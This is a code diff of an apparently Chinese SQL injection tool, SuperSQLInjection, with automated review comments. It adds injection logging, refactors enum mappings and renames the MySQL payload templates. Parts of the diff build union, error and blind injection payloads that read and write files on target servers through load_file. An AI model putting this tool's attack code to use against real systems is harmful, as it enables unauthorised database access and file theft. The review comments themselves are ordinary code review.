config.reTry, config.domain, config.port, "获取原始页面", request, config.timeOut, HTTP.AutoGetEncoding, config.is_foward_302, config.redirectDoGet); - if (!HTTP.AutoGetEncoding.Equals(config.encoding)) { //自定义 @@ -4765,6 +4739,7 @@ namespace SuperSQLInjection { this.Invoke(new showLogDelegate(log), "存在" + pals[2] + "payload:" + pals[0], LogLevel.success); + config.testPayload = pals[0]; selectInjectType(1); //识别数据库 List database_lsit = FileTool.readAllDic("config/database/"); 
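Review bot: The statement `Tools.getRequestURI(this.txt_inject_request.Text);` added as the first line of `btn_autoInject_Click` discards its return value, so it has no effect and looks like a debugging leftover. It runs before the handler's own checks (`autoinject == 0` and the `#inject#` test). If `getRequestURI` throws on empty or malformed request text, the click fails before any validation message is shown; the helper's body is not visible here, so that is an assumption to confirm. The line should be removed, since the URI is already computed where it is needed (`config.uri = Tools.getRequestURI(request);` in the logging blocks). The handler continues outside the hunk.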
@@ -4856,6 +4831,15 @@ namespace SuperSQLInjection { this.Invoke(new showLogDelegate(log), "报告大侠,没有读取到config/injection/injection.txt注入测试payload!", LogLevel.error); } + //记录注入日志 + if (boolInject) { + config.injectType = InjectType.Bool; + config.request= request.Replace(strparam, newParam); + config.dbType = (DBType)Tools.caseDBTypeInt(currentDB); + config.pname = param.Split('=')[0]; + config.uri = Tools.getRequestURI(request); + logInject(config); + } //错误注入测试 this.Invoke(new showLogDelegate(log), "报告大侠,盲注测试完成,正在进行错误显示注入测试!", LogLevel.info); @@ -4885,6 +4869,7 @@ namespace SuperSQLInjection selectInjectType(2); errorInject = true; newParam = strparam.Replace(param, param + "" + pals[0].Replace(pals[4], "#inject#") + ""); + config.testPayload = pals[0]; unionStartPayLoad = pals[0].Substring(0, pals[0].IndexOf(pals[4])).Replace(" or", " and"); this.Invoke(new showLogDelegate(log), "自动标记错误显示注入完成!", LogLevel.info); break; @@ -4899,14 +4884,24 @@ namespace SuperSQLInjection } this.Invoke(new showLogDelegate(log), "报告大侠,错误显示测试完成,正在进行Union注入测试!", LogLevel.info); - //union注入 - //最大100列 + //记录注入日志 + if (errorInject) + { + config.injectType = InjectType.Error; + config.request = request.Replace(strparam, newParam); + config.dbType = (DBType)Tools.caseDBTypeInt(currentDB); + config.pname = param.Split('=')[0]; + config.uri = Tools.getRequestURI(request); + logInject(config); + } + + //union注入 String payload = ""; if ("SQLServer".Equals(currentDB)) { - payload = unionStartPayLoad + "{payload};--"; + payload = unionStartPayLoad + "{payload}--"; } else if ("MySQL".Equals(currentDB)) 
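Review bot: The "record injection log" block added after the blind test is repeated almost verbatim after the error test (hunk at -4899) and after the Union test (hunk at -4989), differing only in the `InjectType` value. One helper such as `private void recordInjection(InjectType type, String request, String strparam, String newParam, String param, String currentDB)` would keep the three copies from drifting apart. Each copy also overwrites `config.request`, `config.injectType` and `config.dbType` on the shared `config` while detection is still running, so later steps in the same run see whatever the last logged type wrote. Whether that is intended cannot be told from the hunk, but passing a copy of the configuration to `logInject` would avoid the side effect. `param.Split('=')[0]` also assumes the parameter has the `name=value` form, and the enclosing method starts and ends outside the hunk.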
@@ -4989,14 +4984,24 @@ namespace SuperSQLInjection } } } - + config.testPayload = unionPayload; } if (isFind) { - + this.Invoke(new showLogDelegate(log), "此注入点支持Union注入,自动选择注入方式完成!", LogLevel.success); } + //记录注入日志 + if (unionInject) + { + config.injectType = InjectType.Union; + config.request = request.Replace(strparam, newParam); + config.dbType = (DBType)Tools.caseDBTypeInt(currentDB); + config.pname = param.Split('=')[0]; + config.uri = Tools.getRequestURI(request); + logInject(config); + } if (boolInject || errorInject || unionInject) { //替换注入位置-标记注入 @@ -5017,6 +5022,38 @@ namespace SuperSQLInjection this.btn_autoInject.Text = "自动识别"; autoinject = 0; } + + public void logInject(Config config) + { + try + { + String savePath = AppDomain.CurrentDomain.BaseDirectory + "/logs/injection/" + config.domain + "/" + config.port + config.uri; + DirectoryInfo dc = new DirectoryInfo(savePath); + dc.Create(); + config.saveConfigpath = dc.FullName + "/" + config.pname + "_" + config.injectType.ToString() + ".xml"; + this.Invoke(new delegatelogInject(logInjectTolvw), config); + XML.saveConfig(config.saveConfigpath, config); + } + catch (Exception e) { + this.Invoke(new showLogDelegate(log), "记录注入日志发生异常!" + e.Message, LogLevel.waring); + } + } + delegate void delegatelogInject(Config config); + + public void logInjectTolvw(Config config){ + ListViewItem lvw = new ListViewItem(config.domain); + lvw.Tag = config.saveConfigpath; + lvw.SubItems.Add(config.port+""); + lvw.SubItems.Add(config.uri); + lvw.SubItems.Add(config.pname); + lvw.SubItems.Add(config.injectType.ToString()); + lvw.SubItems.Add(config.dbType.ToString()); + lvw.SubItems.Add(config.testPayload); + lvw.SubItems.Add(DateTime.Now.ToString()); + + this.lvw_injectLog.Items.Add(lvw); + } + public void selectInjectType(int index) { this.cbox_basic_injectType.SelectedIndex = index; 
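Review bot: `logInject` builds `savePath` by concatenating `config.domain`, `config.port`, `config.uri` and later `config.pname` directly into a filesystem path, and these values are taken from the request text rather than generated by the tool. A URI containing `..` segments can place the created directory and XML file outside `logs/injection`. Characters such as `?`, `:` or `*` make `DirectoryInfo.Create` throw, and the broad `catch (Exception e)` reduces that to a warning, so the record is silently lost. Each component should be reduced to a safe file-name segment and joined with `Path.Combine`, as sketched below. Separately, `XML.saveConfig` is handed the whole `config`, including `config.request`, so any cookies or authorization headers in the request are likely written to plain files under the application directory; that deserves a comment and restricted permissions on the log folder.

```csharp
// inside logInject, replacing the savePath concatenation
String baseDir = Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "logs", "injection");
String savePath = Path.Combine(baseDir, safeSegment(config.domain), safeSegment(config.port + ""), safeSegment(config.uri));
DirectoryInfo dc = new DirectoryInfo(savePath);
dc.Create();
config.saveConfigpath = Path.Combine(dc.FullName, safeSegment(config.pname) + "_" + config.injectType.ToString() + ".xml");
// … unchanged: Invoke(logInjectTolvw) and XML.saveConfig …

// Maps one path component to a name that cannot contain separators or parent references.
private static String safeSegment(String s)
{
    if (String.IsNullOrEmpty(s))
    {
        return "_";
    }
    foreach (char c in Path.GetInvalidFileNameChars())
    {
        s = s.Replace(c, '_');
    }
    return s.Replace("..", "_");
}
```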
@@ -5170,28 +5207,7 @@ namespace SuperSQLInjection private void cbox_basic_dbType_SelectedIndexChanged(object sender, EventArgs e) { - switch (this.cbox_basic_dbType.SelectedIndex) - { - - case 0: - config.dbType = DBType.UnKnow; - break; - case 1: - config.dbType = DBType.Access; - break; - case 2: - config.dbType = DBType.MySQL5; - break; - case 3: - config.dbType = DBType.SQLServer; - break; - case 4: - config.dbType = DBType.Oracle; - break; - case 5: - config.dbType = DBType.MySQL4; - break; - } + config.dbType = (DBType)this.cbox_basic_dbType.SelectedIndex; } private void txt_inject_unionColumnsCount_TextChanged(object sender, EventArgs e) { @@ -5235,7 +5251,6 @@ namespace SuperSQLInjection try { XML.saveConfig("lastConfig.xml", this.config); - } catch (Exception ex) { 
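Review bot: `config.dbType = (DBType)this.cbox_basic_dbType.SelectedIndex;` casts whatever index the combo box reports, including `-1` when no item is selected. An out-of-range enum cast does not throw in C#; it stores a `DBType` value that none of the `switch (config.dbType)` cases elsewhere in this file handles. The removed `switch` ignored unknown indexes, so this is a behaviour change, and it ties the enum's declaration order to the order of the combo-box items (neither is visible in this hunk). A guard keeps the old safety: `int i = this.cbox_basic_dbType.SelectedIndex; if (Enum.IsDefined(typeof(DBType), i)) config.dbType = (DBType)i;`. The same applies to `config.keyType = (KeyType)c;` in `cbox_inject_type_SelectedIndexChanged` (hunk at -7468).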
@@ -5472,79 +5487,20 @@ namespace SuperSQLInjection this.cbox_basic_timeOut.Text = config.timeOut + ""; this.cbox_basic_encoding.Text = config.encoding; this.chk_sencondInject.Checked = config.sencondInject; - switch (config.injectType) - { - - case InjectType.UnKnow: - this.cbox_basic_injectType.SelectedIndex = 0; - break; - case InjectType.Bool: - this.cbox_basic_injectType.SelectedIndex = 1; - break; - case InjectType.Error: - this.cbox_basic_injectType.SelectedIndex = 2; - break; - case InjectType.Union: - this.cbox_basic_injectType.SelectedIndex = 3; - break; - - } - switch (config.dbType) - { - - case DBType.UnKnow: - this.cbox_basic_dbType.SelectedIndex = 0; - break; - case DBType.Access: - this.cbox_basic_dbType.SelectedIndex = 1; - break; - case DBType.MySQL5: - this.cbox_basic_dbType.SelectedIndex = 2; - break; - case DBType.SQLServer: - this.cbox_basic_dbType.SelectedIndex = 3; - break; - case DBType.Oracle: - this.cbox_basic_dbType.SelectedIndex = 4; - break; - case DBType.MySQL4: - this.cbox_basic_dbType.SelectedIndex = 5; - break; - } + this.cbox_basic_injectType.SelectedIndex = (int)config.injectType; + this.cbox_basic_dbType.SelectedIndex = (int)(config.dbType); + this.data_dbs_cob_db_encoding.Text = config.db_encoding; this.cbox_basic_threadSize.Text = config.threadSize + ""; this.cbox_basic_reTryCount.Text = config.reTry + ""; this.txt_inject_key.Text = config.key; this.chk_inject_foward_302.Checked = config.is_foward_302; this.chk_inject_reverseKey.Checked = config.reverseKey; + this.cbox_inject_type.SelectedIndex = (int)(config.keyType); - - switch (config.keyType) + if (config.keyType.Equals(KeyType.Time)) { - - case KeyType.Key: - this.cbox_inject_type.SelectedIndex = 0; - break; - case KeyType.Reg: - this.cbox_inject_type.SelectedIndex = 1; - break; - case KeyType.Code: - this.cbox_inject_type.SelectedIndex = 2; - break; - case KeyType.Time: - this.cbox_inject_type.SelectedIndex = 3; - config.maxTime = Tools.convertToInt(config.key); - break; 
- case KeyType.EQLen: - this.cbox_inject_type.SelectedIndex = 4; - break; - case KeyType.MinLen: - this.cbox_inject_type.SelectedIndex = 5; - break; - case KeyType.MaxLen: - this.cbox_inject_type.SelectedIndex = 6; - break; - + config.maxTime = Tools.convertToInt(config.key); } this.chk_openURLEncoding.Checked = config.isOpenURLEncoding; @@ -5677,9 +5633,8 @@ namespace SuperSQLInjection if (saveFileDialog.ShowDialog() == DialogResult.OK) { XML.saveConfig(saveFileDialog.FileName, config); + MessageBox.Show("导出成功!"); } - - MessageBox.Show("导出成功!"); } private void tsmi_update_Click(object sender, EventArgs e) @@ -5766,7 +5721,7 @@ namespace SuperSQLInjection } if (this.file_cbox_readWrite.SelectedIndex == 0) { - data_payload = MySQL5.hex.Replace("{data}", "load_file(" + path_16 + ")"); + data_payload = MySQL.hex.Replace("{data}", "load_file(" + path_16 + ")"); switch (config.injectType) { case InjectType.Bool: @@ -5777,7 +5732,7 @@ namespace SuperSQLInjection MessageBox.Show("大侠,请在注入中心,配置Bool盲注的判断值!"); return; } - String payload_len = MySQL5.ver_length.Replace("{data}", data_payload); + String payload_len = MySQL.ver_length.Replace("{data}", data_payload); int len = getValueByStepUp(payload_len, 0, 50000); this.dataCount = len; String value = ""; @@ -5811,7 +5766,7 @@ namespace SuperSQLInjection return; } - String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", MySQL5.creatMySQLReadFileByUnion(config.columnsCount, config.showColumn, config.unionFill, "convert(load_file(" + path_16 + ") using UTF8)"))); + String result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", MySQL.creatMySQLReadFileByUnion(config.columnsCount, config.showColumn, config.unionFill, "convert(load_file(" + path_16 + ") using UTF8)"))); this.dataCount = result.Length; this.currentDataCount = result.Length; this.Invoke(new StringDelegate(file_txt_resultSetText), result); 
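Review bot: The new assignments `SelectedIndex = (int)config.injectType`, `(int)(config.dbType)` and `(int)(config.keyType)` take their values from a loaded configuration, and setting `ComboBox.SelectedIndex` to a value at or beyond the item count throws `ArgumentOutOfRangeException`. A configuration saved by an earlier version (which still had `MySQL5` and `MySQL4` members) or edited by hand could therefore abort the whole load, where the removed `switch` blocks simply left the box unchanged. How such files deserialize is not visible here, so that should be confirmed. Clamp before assigning, for example `int i = (int)config.dbType; this.cbox_basic_dbType.SelectedIndex = (i >= 0 && i < this.cbox_basic_dbType.Items.Count) ? i : 0;`, and likewise for the other two boxes. The enclosing method starts and ends outside the hunk.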
@@ -5825,8 +5780,8 @@ namespace SuperSQLInjection case InjectType.Error: try { - String payload_len = MySQL5.char_length.Replace("{data}", data_payload); - String payload_len_error = MySQL5.error_value.Replace("{data}", MySQL5.creatMySQLColumnStr(payload_len)); + String payload_len = MySQL.char_length.Replace("{data}", data_payload); + String payload_len_error = MySQL.error_value.Replace("{data}", MySQL.creatMySQLColumnStr(payload_len)); String result_length = getOneDataByUnionOrError(payload_len_error); @@ -5842,8 +5797,8 @@ namespace SuperSQLInjection while (start < sumlen) { //hex编码,防止中文等乱码 - String datas_value_tmp = ByPassForBetween(MySQL5.creatMySQLColumnStr(MySQL5.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count); - String c_datas_value_payload = MySQL5.error_value.Replace("{data}", datas_value_tmp); + String datas_value_tmp = ByPassForBetween(MySQL.creatMySQLColumnStr(MySQL.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString())), count); + String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_tmp); result += getOneDataByUnionOrError(c_datas_value_payload); start += count; this.currentDataCount = result.Length; @@ -5875,7 +5830,7 @@ namespace SuperSQLInjection { if (!String.IsNullOrEmpty(this.file_txt_result.Text)) { - String payload = MySQL5.creatMySQLWriteFileByUnion(config.columnsCount, config.showColumn, config.unionFill, path, this.file_txt_result.Text); + String payload = MySQL.creatMySQLWriteFileByUnion(config.columnsCount, config.showColumn, config.unionFill, path, this.file_txt_result.Text); HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet); MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!"); } 
@@ -6005,7 +5960,7 @@ namespace SuperSQLInjection { String[] ps = param.ToString().Split('#'); int index = int.Parse(ps[1].ToString()); - String tmp_va_payload = MySQL5.ver_value.Replace("{data}", ps[0]).Replace("{index}", (index + 1) + ""); + String tmp_va_payload = MySQL.ver_value.Replace("{data}", ps[0]).Replace("{index}", (index + 1) + ""); //数字加大写字母的ascii码 int ascii = getValue(tmp_va_payload, 48, 90); ver_tmp[index] = ((char)ascii).ToString(); @@ -6193,7 +6148,7 @@ namespace SuperSQLInjection { if (status == 0) { - if (config.dbType.Equals(DBType.MySQL5) || config.dbType.Equals(DBType.SQLServer)) + if (config.dbType.Equals(DBType.MySQL) || config.dbType.Equals(DBType.SQLServer)) { if (String.IsNullOrEmpty(this.file_txt_filePath.Text)) { @@ -7468,32 +7423,7 @@ namespace SuperSQLInjection private void cbox_inject_type_SelectedIndexChanged(object sender, EventArgs e) { int c = this.cbox_inject_type.SelectedIndex; - switch (c) - { - case 0: - config.keyType = KeyType.Key; - break; - case 1: - config.keyType = KeyType.Reg; - break; - - case 2: - config.keyType = KeyType.Code; - break; - case 3: - config.keyType = KeyType.Time; - break; - case 4: - config.keyType = KeyType.EQLen; - break; - case 5: - config.keyType = KeyType.MaxLen; - break; - case 6: - config.keyType = KeyType.MinLen; - break; - - } + config.keyType = (KeyType)c; } private void tsmi_createGetTemplate_Click(object sender, EventArgs e) 
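Review bot: In `cbox_inject_type_SelectedIndexChanged`, `config.keyType = (KeyType)c;` stores whatever index the combo box reports, including -1 when the selection is cleared, which is not a defined KeyType member; a guard such as `if (c >= 0 && Enum.IsDefined(typeof(KeyType), c)) config.keyType = (KeyType)c;` avoids that. The removed switch here mapped index 5 to MaxLen and 6 to MinLen, while the switch removed in the config-reload hunk mapped MinLen to 5 and MaxLen to 6, so the two directions disagreed. With the cast both now follow the enum's declaration order, which should be checked against the order of the combo box items; neither is visible in this hunk. A comment such as `// item order must match the KeyType declaration` above the cast would record that dependency.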
@@ -7791,30 +7721,52 @@ namespace SuperSQLInjection } } } - private void readData(Object osockt) + + private void bypass_chk_useLike_CheckedChanged(object sender, EventArgs e) { - this.Invoke(new showLogDelegate(log), "接受数据", LogLevel.info); - Socket socket = (Socket)osockt; - - byte[] data = new byte[1024 * 1024]; - //侦听端口号 - String ctmp = ""; - int sum = 0; - do - { - - int len = socket.Receive(data,sum, 1024, SocketFlags.None); - if (len > 0) - { - sum += len; - } - ctmp = Encoding.UTF8.GetString(data); - - } while ((ctmp.IndexOf("\r\n\r\n") == -1)); - this.Invoke(new showLogDelegate(log), ctmp, LogLevel.info); - - + config.useLike = this.bypass_chk_useLike.Checked; + } + + private void tsmi_injectLog_clearAllLog_Click(object sender, EventArgs e) + { + this.lvw_injectLog.Items.Clear(); + Tools.delAllFiles(AppDomain.CurrentDomain.BaseDirectory+ "/logs/injection/"); + MessageBox.Show("记录已经清空!"); + } + + private void tsmi_injectLog_useCLog_Click(object sender, EventArgs e) + { + if (this.lvw_injectLog.SelectedItems.Count > 0) + { + try + { + this.config = XML.readConfig(this.lvw_injectLog.SelectedItems[0].Tag.ToString()); + reloadConfig(this.config); + MessageBox.Show("加载注入记录成功!"); + } + catch (Exception ep) { + log("加载注入记录失败!--"+ep.Message, LogLevel.waring); + } + } + } + + private void tsmi_injectLog_delSLog_Click(object sender, EventArgs e) + { + if (this.lvw_injectLog.SelectedItems.Count > 0) + { + try + { + foreach (ListViewItem lvw in this.lvw_injectLog.SelectedItems) { + Tools.delFile(lvw.Tag.ToString()); + } + this.lvw_injectLog.Items.Remove(this.lvw_injectLog.SelectedItems[0]); + MessageBox.Show("删除选择记录成功!"); + } + catch (Exception ep) + { + log("删除选择记录失败!--" + ep.Message, LogLevel.waring); + } + } } - } } \ No newline at end of file diff --git a/SuperSQLInjection/Main.resx b/SuperSQLInjection/Main.resx index 964c938..221bb67 100644 --- a/SuperSQLInjection/Main.resx +++ b/SuperSQLInjection/Main.resx 
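Review bot: In `tsmi_injectLog_delSLog_Click` the loop deletes the file behind every selected item, but only `SelectedItems[0]` is removed from the list afterwards, so with a multi-selection the other rows stay visible and point at files that no longer exist. Copying the selection first and removing each item as its file is deleted keeps the list and the directory in step, as in the block below. `tsmi_injectLog_clearAllLog_Click` in the same hunk deletes the whole log directory with no confirmation and no try/catch, unlike the two handlers after it; the same error handling would fit there.

```csharp
// … unchanged: SelectedItems.Count guard and try …
ListViewItem[] selected = new ListViewItem[this.lvw_injectLog.SelectedItems.Count];
this.lvw_injectLog.SelectedItems.CopyTo(selected, 0);
foreach (ListViewItem item in selected)
{
    Tools.delFile(item.Tag.ToString());
    this.lvw_injectLog.Items.Remove(item);
}
// … unchanged: success message and catch …
```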
@@ -118,20 +118,180 @@ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 - 142, 6 + 329, 17 - 9, 6 + 182, 17 + + + 477, 17 + + + 17, 55 + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + + 
iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + 613, 17 + + + 388, 55 + + + + AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w + LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 + ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq + DQAAAk1TRnQBSQFMAgEBBwEAAfABBgHwAQYBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo + AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA + AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 + AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA + AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm + AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM + AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA + ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz + AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ + AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM + 
AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA + AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA + AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ + AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/ + AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA + AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm + ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ + Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz + AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA + AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM + AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM + ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM + Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA + AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM + AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ + AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz + AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm + AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw + AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAEP8wAA/vAf8PvAUA + AQcBcgFPA0kBcgEHFAAP7wH/D+8EAAGYAU8BUASYAU8BSQEcEwAB7w3/Ae8B/wHvDf8B7wMAAZgBTwF4 + AQgBmAKXAZgBCAGXAUkBHBIAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABBwFPAXgBCAaX + AQgBlwFJAQcRAAHvAf8C3AL/AtwC/wLcAv8B7wH/Ae8C/wncAv8B7wIAAXgBVgEIApcBeAEbAZgDlwEI + AU8BchEAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7w3/Ae8CAAFQApgBlwF4A/8BmAKXApgBTxEAAe8B/wLc + Av8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABTwGYAZcBeAL/AfQC/wGYApcBmAFJEQAB7wH/AtwC/wLc + 
